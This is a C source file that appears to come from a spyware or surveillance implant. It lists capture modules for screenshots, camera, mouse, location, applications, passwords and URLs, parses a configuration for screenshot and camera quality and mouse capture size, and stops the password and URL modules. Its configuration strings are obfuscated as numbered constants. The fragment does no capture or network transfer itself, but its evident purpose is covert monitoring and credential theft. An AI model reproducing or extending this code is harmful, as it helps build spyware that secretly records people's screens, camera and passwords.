#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

#include "module.h"
#include "config.h"
#include "so.h"
#include "me.h"

module_t modulelist[] = {
   MODULE_SCREENSHOT_ENTRY,
   MODULE_DEVICE_ENTRY,
   MODULE_APPLICATION_ENTRY,
   MODULE_POSITION_ENTRY,
   MODULE_CAMERA_ENTRY,
   MODULE_MOUSE_ENTRY,
   MODULE_PASSWORD_ENTRY,
   MODULE_URL_ENTRY
};

static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

void parsemodules(json_object *config)
{
   int i;
   json_object *modules, *m;
   int modulec;
   char *name, *v;

   pthread_mutex_lock(&mutex);

   for(i = 0; i < (sizeof(modulelist) / sizeof(module_t)); i++) if(modulelist[i].param) free(modulelist[i].param);

   modules = json_object_object_get(config, so88);
   modulec = json_object_array_length(modules);

   for(i = 0; i < modulec; i++) {
      m = json_object_array_get_idx(modules, i);
      get_string(m, so89, &name);

      if(!strcmp(name, so90)) {
         MODULE_SCREENSHOT.param = malloc(sizeof(module_screenshot_t));
         get_string(m, so91, &v);
         if(!strcmp(v, so92)) {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 30;
         } else if(!strcmp(v, so93)) {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 60;
         } else {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 90;
         }
      } else if(!strcmp(name, so94)) {
         MODULE_CAMERA.param = malloc(sizeof(module_camera_t));
         get_string(m, so91, &v);
         if(!strcmp(v, so92)) {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 30;
         } else if(!strcmp(v, so93)) {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 60;
         } else {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 90;
         }
      } else if(!strcmp(name, so98)) {
         MODULE_MOUSE.param = malloc(sizeof(module_mouse_t));
         get_int(m, so99, ((int *)&((module_mouse_t *)MODULE_MOUSE.param)->width));
         get_int(m, so100, ((int *)&((module_mouse_t *)MODULE_MOUSE.param)->height));
      }
   }

   pthread_mutex_unlock(&mutex);

   return;
}

void stopmodule(void)
{
   if(MODULE_MOUSE.status != MODULE_STOPPED) {
      MODULE_MOUSE.status = MODULE_STOPPING;
      while(MODULE_MOUSE.status != MODULE_STOPPED) sleep(1);
   }
   if(MODULE_PASSWORD.status != MODULE_STOPPED) {
      MODULE_PASSWORD.status = MODULE_STOPPING;
      while(MODULE_PASSWORD.status != MODULE_STOPPED) sleep(1);
   }
   if(MODULE_URL.status != MODULE_STOPPED) {
      MODULE_URL.status = MODULE_STOPPING;
      while(MODULE_URL.status != MODULE_STOPPED) sleep(1);
   }

   return;
}

